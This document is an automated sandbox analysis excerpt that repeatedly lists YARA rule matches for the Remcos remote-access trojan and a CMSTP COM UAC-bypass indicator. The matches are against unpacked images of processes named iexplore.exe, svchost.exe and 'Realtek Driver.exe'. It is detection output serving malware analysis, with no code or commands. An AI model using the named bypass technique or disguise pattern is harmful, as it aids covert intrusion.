                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.4ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.2.Realtek Driver.exe.5e0620.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 8.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 4.2.svchost.exe.3030000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.4ba0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.2d70000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.30e0ba0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 0.0.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 0.2.1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.2.Realtek Driver.exe.5e0620.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 7.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.30e0ba0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 4.2.svchost.exe.3030000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.2.Realtek Driver.exe.2570000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 5.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 2.2.Realtek Driver.exe.2570000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 7.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 3.2.iexplore.exe.2d70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 8.2.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                            Source: 5.0.Realtek Driver.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 00000008.00000000.2277687152.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: 00000002.00000002.2024293538.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
